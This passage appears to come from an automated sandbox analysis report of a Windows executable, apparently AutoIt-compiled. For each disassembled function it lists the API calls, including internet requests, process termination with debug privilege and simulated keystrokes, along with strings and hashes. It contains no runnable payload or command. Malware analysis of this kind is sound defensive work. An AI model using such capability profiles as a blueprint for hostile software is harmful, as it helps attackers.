                                      • Instruction Fuzzy Hash: C971DE30500209DFCF219F64C994FEA3BB2FF4A364F245269ED559A2AAC730C881EF50
                                      Function 008BAF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlDecodePointer.NTDLL(?), ref: 008BAFAB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 32f9a53a43b1e5f98cbdab59c4b788a6e84dd7dd763e718080a7ab70481d1ae0
                                      • Instruction ID: 4d2408c4daf51ee7c01ee11dde4480119a876f16c090fa5ad0831bc58a7d1a28
                                      • Opcode Fuzzy Hash: 32f9a53a43b1e5f98cbdab59c4b788a6e84dd7dd763e718080a7ab70481d1ae0
                                      • Instruction Fuzzy Hash: B2517AB0900A1EDBCF24DFACE9581FDBBB4FB49304F204195E491E7368CBB189259B59
                                      Function 008F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008F35E4
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • LoadStringW.USER32(00952390,?,00000FFF,?), ref: 008F360A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-2391861430
                                      • Opcode ID: 876d012266610d4e5a12ca18b03508e45e435b84a56654ebe5901d8b12754df6
                                      • Instruction ID: cf6d93c7bc8e7b27446ce3fea8fc130873b1438dd428fc373a46e7e1d7ce683c
                                      • Opcode Fuzzy Hash: 876d012266610d4e5a12ca18b03508e45e435b84a56654ebe5901d8b12754df6
                                      • Instruction Fuzzy Hash: 33515D7190020AAADF14FBA4DC42EFEBB79FF15304F144125F205B21A1EB315B99DBA2
                                      Function 008FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008FC272
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008FC29A
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008FC2CA
                                      • GetLastError.KERNEL32 ref: 008FC322
                                      • SetEvent.KERNEL32(?), ref: 008FC336
                                      • InternetCloseHandle.WININET(00000000), ref: 008FC341
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: 92c061ef663faf2e9ebe365fdc75123e84dcb803ed993cc2c356f95571252591
                                      • Instruction ID: 3df081a4aea1b67d5bd404e9cc825177db62ae735071cc9059b4b87dcfd60db3
                                      • Opcode Fuzzy Hash: 92c061ef663faf2e9ebe365fdc75123e84dcb803ed993cc2c356f95571252591
                                      • Instruction Fuzzy Hash: 66316BB164460CAFD7219FB48A88ABB7AFCFB49784B14851EF546D2240DB70DE04DB61
                                      Function 008E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008C3AAF,?,?,Bad directive syntax error,0091CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008E98BC
                                      • LoadStringW.USER32(00000000,?,008C3AAF,?), ref: 008E98C3
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008E9987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString_wcslen
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 858772685-4153970271
                                      • Opcode ID: 061c6cdee864fd4c3546d4017256cf50835479e6ee12cfec95027a546754f6d0
                                      • Instruction ID: f11b5022ea7f442f6f90a754a1633129811ee53b97f2aaba43c797488220fbe2
                                      • Opcode Fuzzy Hash: 061c6cdee864fd4c3546d4017256cf50835479e6ee12cfec95027a546754f6d0
                                      • Instruction Fuzzy Hash: 3E218D7294021EABCF15BF94CC0AEEE7739FF19704F084469F515A20A2EB719A18DB52
                                      Function 008E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 008E20AB
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 008E20C0
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008E214D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1290815626-3381328864
                                      • Opcode ID: 3d8f85d2ed03b7850e4beb64709543c1924c240e00bcaa530e5f4592d9314590
                                      • Instruction ID: 2f5c04c10b4c380bcbbd94135406085ceb952428dde7e6da70bfde5faf09302a
                                      • Opcode Fuzzy Hash: 3d8f85d2ed03b7850e4beb64709543c1924c240e00bcaa530e5f4592d9314590
                                      • Instruction Fuzzy Hash: 071106766C871BBAFB016225EC06DE6379CEB47328B210016FB04E50E2FAA1B9416615
                                      Function 008B8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb045a0ba201d2ee6427f9e78765929373c8d05eb0dc5adfe88cbb7beda38bac
                                      • Instruction ID: c036d37d4a291333c2c4207b7ab5d02a445cbdeb9452773cff01cd517f37d65b
                                      • Opcode Fuzzy Hash: cb045a0ba201d2ee6427f9e78765929373c8d05eb0dc5adfe88cbb7beda38bac
                                      • Instruction Fuzzy Hash: ACC1BF74A04249EFDB11AFACD841BEDBBB4FF4A310F144199EA54E7392CB309942CB61
                                      Function 008BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                      • String ID:
                                      • API String ID: 1282221369-0
                                      • Opcode ID: 398f9d06ebcae83766c8fd786388136e77945fc607562d2d2be775c4f2122bb6
                                      • Instruction ID: df9b83d3a1e8758db7165cbfe8dd7202d24046b4b94ab2498bd1ec1b0e800714
                                      • Opcode Fuzzy Hash: 398f9d06ebcae83766c8fd786388136e77945fc607562d2d2be775c4f2122bb6
                                      • Instruction Fuzzy Hash: FC612571A08305AFDB21AFB89882AFE7BA5FF05320F0441ADF944D7382EB719D019751
                                      Function 00898BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00898F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00898BE8,?,00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898FC5
                                      • DestroyWindow.USER32(?), ref: 00898C81
                                      • KillTimer.USER32(00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898D1B
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 008D6973
                                      • DeleteObject.GDI32(00000000), ref: 008D69E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 2402799130-0
                                      • Opcode ID: f4b351f00408f8ad675913bddc68b59b658a84d739db585fe37345ec64d9daba
                                      • Instruction ID: 08682a6297f7a8b5f27f5ab7e68571e6ba904bfc7a11aceaf604c2fbad8c2ad4
                                      • Opcode Fuzzy Hash: f4b351f00408f8ad675913bddc68b59b658a84d739db585fe37345ec64d9daba
                                      • Instruction Fuzzy Hash: 9061BD3051A71ADFCF25AF19D958B2977F1FB4131AF188519E082DB6A0CB31AD90EF90
                                      Function 00898B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008D6890
                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008D68A9
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008D68B9
                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008D68D1
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008D68F2
                                      • DestroyCursor.USER32(00000000), ref: 008D6901
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008D691E
                                      • DestroyCursor.USER32(00000000), ref: 008D692D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 3992029641-0
                                      • Opcode ID: e7ad3d90d9713e23fbb5a2ceafb59ee1ed43c41c35cd97ff527b41a4645ccd5c
                                      • Instruction ID: fac03f4d89618e9a2447bf50f7da5eedaea4efd7b469c24d7e59d916730e006f
                                      • Opcode Fuzzy Hash: e7ad3d90d9713e23fbb5a2ceafb59ee1ed43c41c35cd97ff527b41a4645ccd5c
                                      • Instruction Fuzzy Hash: 3D518AB061020AEFDB20DF25CC55FAA7BB5FB44364F184619F952D72A0EB70E990EB40
                                      Function 008FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008FC182
                                      • GetLastError.KERNEL32 ref: 008FC195
                                      • SetEvent.KERNEL32(?), ref: 008FC1A9
                                        • Part of subcall function 008FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008FC272
                                        • Part of subcall function 008FC253: GetLastError.KERNEL32 ref: 008FC322
                                        • Part of subcall function 008FC253: SetEvent.KERNEL32(?), ref: 008FC336
                                        • Part of subcall function 008FC253: InternetCloseHandle.WININET(00000000), ref: 008FC341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 337547030-0
                                      • Opcode ID: 0971cceb4f31f5c048f4a7b33ef39a6c62a89c9efd1e8fdc2f3181d822742cb8
                                      • Instruction ID: f37fcc8a553737ec65c25b3ecc9e14d5402b544437127db37d8d2a2cfe350f60
                                      • Opcode Fuzzy Hash: 0971cceb4f31f5c048f4a7b33ef39a6c62a89c9efd1e8fdc2f3181d822742cb8
                                      • Instruction Fuzzy Hash: 303190B164460DAFDB219FB5DE44AB6BBF8FF18300B14841DFA56C2611DB31EA14EB60
                                      Function 008E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E25BD
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008E25DB
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008E25DF
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E25E9
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008E2601
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 008E2605
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E260F
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008E2623
                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 008E2627
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: bb53f3ff5fb517834191d4a606408aabc8989bf3c636c8763368e819f0643257
                                      • Instruction ID: dc653eac3cac58e7ee50b1bf67b3e3e92af157b8ee984ee2029dc89cf5438497
                                      • Opcode Fuzzy Hash: bb53f3ff5fb517834191d4a606408aabc8989bf3c636c8763368e819f0643257
                                      • Instruction Fuzzy Hash: 3D01B5703D8764BBFB1067699C8AF993E59EB4AB51F104011F318AF0D1C9E11444DA6A
                                      Function 008E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,008E1449,?,?,00000000), ref: 008E180C
                                      • RtlAllocateHeap.NTDLL(00000000,?,008E1449), ref: 008E1813
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E1449,?,?,00000000), ref: 008E1828
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,008E1449,?,?,00000000), ref: 008E1830
                                      • DuplicateHandle.KERNEL32(00000000,?,008E1449,?,?,00000000), ref: 008E1833
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E1449,?,?,00000000), ref: 008E1843
                                      • GetCurrentProcess.KERNEL32(008E1449,00000000,?,008E1449,?,?,00000000), ref: 008E184B
                                      • DuplicateHandle.KERNEL32(00000000,?,008E1449,?,?,00000000), ref: 008E184E
                                      • CreateThread.KERNEL32(00000000,00000000,008E1874,00000000,00000000,00000000), ref: 008E1868
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                      • String ID:
                                      • API String ID: 1422014791-0
                                      • Opcode ID: b9ea663ff0550438e786e4e1cc82d5f1a954e513ce0d8a197c64b75e22627b41
                                      • Instruction ID: 9e2b5cec00b67fa698f2b4675f71654e135717689b4b3f4a64562b837ae3425f
                                      • Opcode Fuzzy Hash: b9ea663ff0550438e786e4e1cc82d5f1a954e513ce0d8a197c64b75e22627b41
                                      • Instruction Fuzzy Hash: 4E01BFB53D4344BFE710AB65DC4DF977B6CEB89B11F408411FA05DB191C6749800DB20
                                      Function 0090A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 008ED501
                                        • Part of subcall function 008ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 008ED50F
                                        • Part of subcall function 008ED4DC: CloseHandle.KERNEL32(00000000), ref: 008ED5DC
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090A16D
                                      • GetLastError.KERNEL32 ref: 0090A180
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090A1B3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0090A268
                                      • GetLastError.KERNEL32(00000000), ref: 0090A273
                                      • CloseHandle.KERNEL32(00000000), ref: 0090A2C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: a5d688db75ed508238a2ff26b4edf27c0358dd42893511a8c098316120b40669
                                      • Instruction ID: 4fbd44190a0307e1490bb5fa95e37ba1b4357eaacbb6463a344a24b98efaee37
                                      • Opcode Fuzzy Hash: a5d688db75ed508238a2ff26b4edf27c0358dd42893511a8c098316120b40669
                                      • Instruction Fuzzy Hash: AE617970208342AFD720DF19C894F26BBA5AF54318F18849CE4668B7A3C776ED45CBD2
                                      Function 00913886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00913925
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0091393A
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00913954
                                      • _wcslen.LIBCMT ref: 00913999
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 009139C6
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009139F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
